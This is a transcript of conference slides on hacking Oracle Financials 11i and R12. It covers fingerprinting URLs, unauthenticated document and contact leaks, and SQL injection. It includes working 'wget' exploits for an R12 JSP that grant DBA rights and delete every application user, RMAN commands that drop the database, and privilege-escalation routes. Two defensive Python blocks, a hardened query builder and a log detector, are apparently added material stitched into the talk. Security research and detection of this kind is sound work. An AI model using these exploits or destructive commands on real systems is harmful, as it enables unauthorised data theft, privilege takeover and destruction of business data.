Joxean Koret - Hackproofing Oracle Financials 11i & R12 [RootedCON 2010]

Date post: 05-Dec-2014
Upload: rootedcon

Description:
After an introduction to the Oracle Financials product and an explanation of its architecture and of the components of versions 11i and R12, design flaws and already-fixed vulnerabilities in 11i are shown, together with 0day vulnerabilities for version R12.

Transcript
Page 1: Joxean Koret - Hackproofing Oracle Financials 11i & R12 [RootedCON 2010]

Vulnerabilities in Oracle Financials - Joxean Koret

Hackproofing Oracle Financials
Vulnerabilities in Oracle E-Business Suite R12

What is Oracle Financials?
It is an Enterprise Resource Planning (ERP) product.
The names Oracle E-Business Suite, Oracle Applications, Oracle Financials, etc. all refer to the same product.

ERP Statistics
As of 2005, SAP and Oracle Applications were the most deployed.

Market Share

Who is using Oracle Financials?
Very large list of customers:
  http://www.oracle.com/customers/products/financials2.html
In short...
  Militaries & governments, e.g. the North Atlantic Treaty Organization (NATO)
  Banks
  Airways & airlines
  Petrochemical companies
  Hospitals
  ...

Some well known customers
Marvel, Banque de France, U.S. Airways, U.S. Navy, U.S. Army, Mitsubishi, Airtel, NH Hotels, Canon, EMC Corporation, Flemish Government, Fujitsu, Toshiba, Google Inc, Unisys, U.S. Postal Service, Toyota, General Electric, Dubai's Government, Oracle itself, etc.
Enough (and interesting) customers to care about ;)

About the talk
What are we going to cover in this talk?
  Architecture overview (basic concepts + brief introduction)
  Components (11i & R12)
  Design flaws
  Vulnerabilities
  How to own

Architecture Overview

Architecture: Attacker's point of view
Application server's components:
  Web Server, Forms Server (& Reports Server)
    But Reports is not always available from the internet
  JSP, Servlets, CGIs and "the" PL/SQL Gateway
    PL/SQL Gateway removed in R12 due to many security problems
Database server's components:
  Data
  PL/SQL software

Basic Concepts
Forms Server
  Java applet that communicates (via HTTP in the latest versions) with the application server
  Used to show GUIs
Reports Server
  The same, but only for reports
PL/SQL Gateway
  A way to execute PL/SQL code directly from a browser, like a CGI but inside the database

Information Gathering

Information Gathering
Oracle Financials 11i:
  http://middletier/pls/DAD/fnd_web.ping
Oracle Financials R12:
  PL/SQL Gateway removed, URL changed to:
  http://middletier/OA_HTML/jsp/fnd/fndping.jsp
What information do we get this way?

Information Gathered

Information Gathering
Install Path Disclosure

Install Path Disclosure
The script /OA_HTML/biserror.jsp receives a parameter called "DBC" (DataBase Configuration).
  It is a file in the middle tier with information regarding the database address, etc.
  It reveals the installation path when a non-existent DBC file is given to the script.

Installation Path Disclosure

Information Gathering
The information retrieved is (sometimes) vital for successful intrusions:
  Database's SID and schema (commonly APPS)
  It's also typical to host multiple Oracle Financials instances on the same machine:
    /d01/apps/r12
    /d02/apps/r11
  You must know the operating system to completely own the system

Vulnerabilities

Vulnerabilities by component
Middle tier:
  Oracle Forms
  PL/SQL Gateway (only in version 11i)
  JSP
Database backend:
  Oracle Database
Middle tier (again):
  The Printers From Hell

Vulnerabilities: Cross Site Scripting
Oracle Financials is full of XSS vulnerabilities.
For example, the script biserror.jsp is designed to show an error page with a custom message.
  The message text can be HTML code
  By design!

XSS in biserror.jsp

Vulnerabilities
Cross Site Scripting vulnerabilities can only be useful (when you do not have real exploits) for:
  Session hijacking
  Phishing
  Manipulating admin panels
  Etc.
However, there are many very interesting vulnerabilities in Oracle Financials, so ignore XSS ;)

Mistakes
The very first vulnerability I found in Oracle Financials 11i was only applicable to AIX (unfortunately).
The SYSADMIN user has the responsibility (role) SYSADMIN.
Looking for other users with the same responsibility...
The GUEST user appears! So any GUEST user is, in fact, SYSADMIN!!!
Cool!
Applicable to all Oracle Apps 11i versions for AIX.

For the developers...

Oracle Forms
One of the more interesting vulnerabilities is in the Oracle Forms Listener.
Whenever a new user wants to connect to Oracle Forms via the web, a login form is shown.
  It is a Java applet

The Login Form

Oracle Forms Listener
But how is the form loaded? What parameters are given from the browser to the server, if any?
Remember, it's a Java applet that communicates with the application server.

Oracle Forms Listener
Answer:

Oracle Forms Listener
So, again, we have another installation path disclosure but, wait...
What if you're able to upload a new form to the server, to a temporary path, for example?
  The form will be executed before doing logon
Possible temporary paths:
  /incoming
  /tmp

Oracle Forms Listener
The source code of almost every form in Oracle Financials is available:
  Source code for the login form is in $FND_TOP/US/FNDSCSGN.fmb

Oracle Forms Source
$ cd $FND_TOP
$ pwd
/u03/oracle/prodappl/fnd/11.5.0/
$ cd forms
$ ls
E US
$ ls US/
APPTREE.fmx FNDATENT.fmx FNDCPDIA.fmx FNDCUSTM.fmx FNDFFMIS.fmx
FNDFMFUN.fmx FNDPOMPV.fmx FNDSCAUS.fmx FNDSNDSQ.fmx FNDADDSQ.fmx
FNDATFUN.fmx FNDCPDPD.fmx FNDFBMAS.fmx FNDFFMSA.fmx FNDLVMLU.fmx
FNDPOMSV.fmx FNDSCDDG.fmx TEMPLATE.fmx (...)

Old Vulnerabilities: PL/SQL Gateway
In the prior version (Oracle Financials 11i) almost all the vulnerabilities I found were SQL injection or "mistakes".
  Thanks to the PL/SQL Gateway
I'm going to tell you about various of them.
Sorry, no demo for this version :(

The PL/SQL Gateway
Remember, the PL/SQL Gateway is a way to directly execute PL/SQL code in the database via a browser.
"Where you see a feature I see a flaw!"
What if the PL/SQL code contains vulnerabilities?
  You're running code directly in the database
  You can run any procedure granted to PUBLIC
  A lot of them, about thousands in total
Cool!

Some reported & fixed vulnerabilities
http://<target>/pls/<DAD>/ADI_display_report.DisplayFile?P_DOCID=<doc id>
http://<target>/pls/<DAD>/ADI_BINARY_FILE.Show?p_DocumentId=<doc id>
  Download any document stored in the ERP (contracts, etc.) without being authenticated
  Just brute force the doc_id and that's all

PL/SQL Gateway
But, wait! I don't know the DAD?
OK, simply navigate with your browser to the following location:
  http://<target>:<port>/pls/
You will be redirected to the URL /pls/DAD/fnd_web.ping
In Oracle Apps since 11.5.10.2 you will get the message "Unauthorized"
  But, well, when accessing the URL you were redirected to...

More vulnerabilities in Apps 11i
How can I see the complete list of customers and contacts of my adversary corporation?
Easy! The following URL is your answer:
  /pls/<DAD>/ICXSUPWF.DISPLAYCONTACTS
No check for a valid session, valid privileges, etc.
The complete list of customers and contacts is printed in the web page.
Cool++!

SQL Injection
Another vulnerable package (the name says that it's surely vulnerable):
  /pls/DAD/ICX_UTIL.LOVVALUES
A LOV, in Oracle language, is a List Of Values
  Typically, an SQL query to show some data
The script receives 2 cool parameters:
  c_where_clause & c_js_where_clause
Guess what is the purpose of the parameters?
Cool^2

Returning to ICXSUPWF.DISPLAYCONTACTS
Do you remember the package to download the complete customer list?
Well, this package also receives a seemingly equal parameter:
  p_where
Of course, this is an SQL WHERE clause.

Sufficient SQL Injections
OK, we have sufficient "SQL injections?" (or design flaws?) for now but, what can I do with them?
Well, some facts:
  You're running your SQL code as the APPS user
  The APPS user is the owner of the ERP's data
    So you're the new owner of the data :)
  Also, the APPS user has been granted the DBA role
    So you're also the new DBA
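The p_where / c_where_clause parameters above are a design flaw rather than an input-validation slip: the HTTP caller, not the package, decides what the WHERE clause says. This added example (not code from the talk or from Oracle; it uses sqlite3 and a constructed contacts table as a stand-in for the APPS schema) puts that pattern next to the structured alternative, where the request may only name an allowlisted column and operator and the value travels as a bind variable:

```python
import sqlite3

# Constructed data standing in for the customer/contact list; not real records.
SAMPLE_ROWS = [
    (1, "ACME Corp", "alice@example.invalid", 10),
    (2, "Globex", "bob@example.invalid", 10),
    (3, "Initech", "carol@example.invalid", 20),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE contacts (id INTEGER, org TEXT, email TEXT, owner_id INTEGER)")
    db.executemany("INSERT INTO contacts VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return db


def lov_values_flawed(db, p_where):
    """The pattern criticised in the talk: the caller's WHERE clause is appended
    verbatim, so the caller chooses which rows (of any owner) come back."""
    sql = "SELECT id, org, email FROM contacts WHERE " + p_where
    return db.execute(sql).fetchall()


# Hardened form: only these columns and operators can be named from the request.
FILTERABLE = {"org": "org", "email": "email"}
OPERATORS = {"eq": "=", "like": "LIKE"}


def lov_values_hardened(db, owner_id, column, op, value):
    """WHERE clause assembled from fixed fragments; the session's owner_id is
    applied server-side and cannot be overridden; the value is a bind variable."""
    if column not in FILTERABLE or op not in OPERATORS:
        raise ValueError("filter not permitted: %r %r" % (column, op))
    sql = ("SELECT id, org, email FROM contacts WHERE owner_id = ? AND %s %s ?"
           % (FILTERABLE[column], OPERATORS[op]))
    return db.execute(sql, (owner_id, value)).fetchall()


def demo():
    """Contrast both forms on the same data; returns counts for the assertions."""
    db = make_db()
    leaked = lov_values_flawed(db, "1=1")                         # every row, any caller
    scoped = lov_values_hardened(db, 10, "org", "like", "%")     # only owner 10's rows
    injected = lov_values_hardened(db, 10, "org", "eq", "x' OR 1=1 --")  # bound: inert
    try:
        lov_values_hardened(db, 10, "owner_id", "eq", 20)         # not an allowed column
        rejected = False
    except ValueError:
        rejected = True
    return {"leaked": len(leaked), "scoped": len(scoped),
            "bound_value_inert": injected == [], "rejected": rejected}


if __name__ == "__main__":
    print(demo())
```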

Oracle Database User APPS
Running SQL code as any DBA you can do whatever you want, for example:
  Create a Java procedure to execute OS commands and to connect back to you
  Create a PL/SQL backdoor to make executing new commands "easier?"
  Execute a funny OS + RMAN command:
    $ rman target /
    rman> sql 'shutdown abort'
    rman> drop database including backups noprompt;
  And kill her wife if possible

Oracle Financials R12
I think that I showed sufficient (old, fixed) Oracle Apps 11i vulnerabilities.
Now, it's time for Oracle Applications R12.

Oracle Applications R12: Changes
In this version Oracle removed the PL/SQL Gateway
  No fun :(
But they ported almost all the packages to JSP
So the only change for us is that we don't need a DAD this time; we already know the complete URL to access every JSP:
  http://<target>:<port>/OA_HTML/<yourjsp.jsp>

Oracle Applications R12: Changes
In this version they check in almost all JSP scripts for a valid session, except for applications allowed to GUEST.
However, we can still have fun ;)

Establishing a GUEST session
To establish a GUEST session you just need to navigate to any "allowed to GUEST" JSP and, automagically, a new session will be created for you.

Guest Sessions
When you want to log on via the web page you're greeted with a web page similar if not equal to the following one:

Guest Sessions
When you log on correctly you're redirected to the following web page:

Guest Sessions
If you navigate (before doing logon) directly to this web page an exception occurs, but a new GUEST session gets created.

Servlet's Source Code

Guest Sessions
With a valid GUEST session we can now access any JSP.
  But some of them will check if we have the correct privileges or simply fail because we're not SYSADMIN, etc.
Anyway, our attack surface has significantly increased :)

Oracle Financials R12
OK so... Do you remember the flaws where you can inject any WHERE clause in Oracle Apps 11i?
Well, Oracle always surprised me...

Oracle Applications R12
In this version they added a cool script called jtfwcpnt.jsp.
It is a component of the Oracle Financials CRM.
In Oracle's words:
  "A Card Paint to display cards in Smart ListSearch"
  Questions to Larry Ellison, plz!
The script is completely flawed.

jtfwcpnt.jsp
This cool script receives one interesting parameter:
  query
Do I need to explain something else?
Let's see a very complicated exploit...

jtfwcpnt.jsp 0days 3xpl01ts
$ export TARGET="http://<target>:<port>/OA_HTML"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;"
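Every request shown in this deck, the 11i PL/SQL gateway calls with their WHERE-clause parameters (ICX_UTIL.LOVVALUES, ICXSUPWF.DISPLAYCONTACTS, the ADI document downloads) and the R12 jtfwcpnt.jsp "query" parameter, leaves a line in the middle tier's web access log. The detection logic below is an added example (not from the talk or from Oracle): it parses common-log-format lines, flags those endpoints, and raises the severity when the parameter carries a PL/SQL block or DDL/DML rather than a plain filter. The log lines, client IPs and the DAD name "PROD" are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Common/combined log format prefix: client - - [time] "METHOD url HTTP/x" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

# Endpoints named in the talk: (path regex, parameters that carry raw SQL, description).
# Matching is case-insensitive: PL/SQL package and parameter names are not case sensitive.
RULES = [
    (r"/pls/[^/]+/ICX_UTIL\.LOVVALUES$", ("c_where_clause", "c_js_where_clause"),
     "11i ICX_UTIL.LOVVALUES with caller-supplied WHERE clause"),
    (r"/pls/[^/]+/ICXSUPWF\.DISPLAYCONTACTS$", ("p_where",),
     "11i ICXSUPWF.DISPLAYCONTACTS contact listing (no session check)"),
    (r"/pls/[^/]+/ADI_(display_report\.DisplayFile|BINARY_FILE\.Show)$", (),
     "11i ADI document download without authentication"),
    (r"/OA_HTML/jtfwcpnt\.jsp$", ("query",),
     "R12 jtfwcpnt.jsp 'query' parameter"),
]

# Tokens showing the parameter holds executable PL/SQL (anonymous block, dynamic SQL, DDL/DML).
PLSQL_TOKENS = re.compile(
    r"\b(begin|execute\s+immediate|grant|delete|insert|update|commit|drop)\b", re.I)


def query_params(query):
    """Split a query string on '&' only (a ';' inside a value is kept), lower-casing names."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote_plus(name).lower(), []).append(unquote_plus(value))
    return params


def classify(url):
    """Return (description, severity, evidence) for one request URL, or None."""
    parts = urlsplit(url)
    for path_re, sql_params, desc in RULES:
        if not re.search(path_re, parts.path, re.I):
            continue
        if not sql_params:                      # reaching the endpoint is the finding
            return desc, "medium", None
        params = query_params(parts.query)
        values = [v for name in sql_params for v in params.get(name, [])]
        if not values:                          # endpoint hit, SQL parameter absent
            return desc, "low", None
        severity = "high" if PLSQL_TOKENS.search(values[0]) else "medium"
        return desc, severity, values[0]
    return None


def scan(lines):
    """Scan access-log lines and return one finding dict per matching request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hit = classify(m["url"]) if m else None
        if hit:
            desc, severity, evidence = hit
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "endpoint": desc, "severity": severity, "evidence": evidence})
    return findings


# Constructed sample log lines (not real traffic); DAD name and client IPs are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2010:11:02:13 +0100] "GET /OA_HTML/OA.jsp HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Mar/2010:11:02:14 +0100] "GET /OA_HTML/jtfwcpnt.jsp?query=begin%20execute%20immediate%20%27grant%20dba%20to%20mom%27;%20end; HTTP/1.1" 500 812',
    '198.51.100.4 - - [10/Mar/2010:11:03:01 +0100] "GET /pls/PROD/ICX_UTIL.LOVVALUES?c_where_clause=1%3D1 HTTP/1.1" 200 90210',
    '198.51.100.4 - - [10/Mar/2010:11:03:05 +0100] "GET /pls/PROD/ICXSUPWF.DISPLAYCONTACTS HTTP/1.1" 200 40011',
    '192.0.2.9 - - [10/Mar/2010:11:04:20 +0100] "GET /pls/PROD/ADI_BINARY_FILE.Show?p_DocumentId=1042 HTTP/1.1" 200 77312',
    '192.0.2.9 - - [10/Mar/2010:11:04:21 +0100] "GET /OA_HTML/AppsLogin HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:13} {f['endpoint']}  evidence={f['evidence']!r}")
```

A GET to /pls/ or to fnd_web.ping / fndping.jsp from outside the corporate network is worth a rule of its own; it is the fingerprinting step the deck describes and is omitted here for brevity.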

Creating a new SYSADMIN user
We're running code as the APPS user so, again, we're the new owner of the data.
So we can, for example, create a new SYSADMIN-like user:

Responsibilities
Running this PL/SQL code via the jtfwcpnt.jsp script we create a new user and assign 2 responsibilities:
  20420 – System Administrator (SYSADMIN)
  20872 – System Administration

Owning by tiers
Abusing this flaw we gained access to the database backend.
If we just want to extract some data, we're done: delete the created user and that's all.
However, if we want to continue owning all the rest of the tiers we need to find a way to execute code also in the middle tier.
  Remember, we gained access to the database and it will be in a different box :(

Gaining Access to the Middle-tiers
How can we gain access to the middle tiers?
  Checked for a flawed JSP that writes something to disk, but nothing was found
  Checked also for Runtime.getRuntime() and so on: no luck :(
But found a funny technique:
  The Printer From Hell

The Printers From Hell

The Printer From Hell
Oracle Applications Server is a web based application.
It's designed to be used by big companies, either connected from the LAN or from the Internet.
They designed a way to print to a system-administrator-specified printer from anywhere.
But, how are the printers configured?
  The administrator does this via the ERP or by directly inserting into the database


The Printer From Hell
We have a "printer coming from hell": just print something using the ERP or the PL/SQL packages and you're done.
Th3 c0mpl3t3 $y$t3m w4$ 0wN3|)

However...
We're running code as the "oracle" OS-level user but I know no way to escalate to root :(
  Well, if the database server is not correctly patched we can always use the "extjob" suid tool
  Vulnerability CVE-2008-2613
But, what if the system is a Win32 box?
  Don't worry! You're already running code as Local System :)

Conclusions

Oracle Financials R12
It's getting better in some aspects but there are plenty of quite stupid vulnerabilities.
It's OK (in my opinion) to run it in our companies as an intranet application, but you should take care opening connectivity to Oracle Financials from the Internet.
IMHO...

Final Conclusion?

The End
Thank you folks!